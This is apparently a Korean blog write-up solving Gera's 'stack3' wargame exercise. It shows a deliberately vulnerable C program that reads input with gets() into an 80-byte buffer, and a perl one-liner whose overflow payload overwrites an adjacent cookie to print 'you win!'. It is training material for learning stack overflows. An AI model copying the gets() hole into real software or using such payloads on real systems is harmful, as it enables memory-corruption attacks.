Gera _ Stack #3

/*
 * http://sosal.tistory.com/
 * made by so_Sal
 */


/* stack3.c                                     *
* specially crafted to feed your brain by gera */

int main() {
int cookie;
char buf[80];

printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);

if (cookie == 0x01020005)
printf("you win!\n");
}



[sosal@localhost gera]$ (perl -e 'print "\x05\x00\x02\x01"x24';cat) | ./stack3
buf: bfc527e0 cookie: bfc52830

you win!

gets 함수는 00 (NULL)도 허용하기 때문에 1,2번 문제와 다름 없습니다.
음.. 음;;;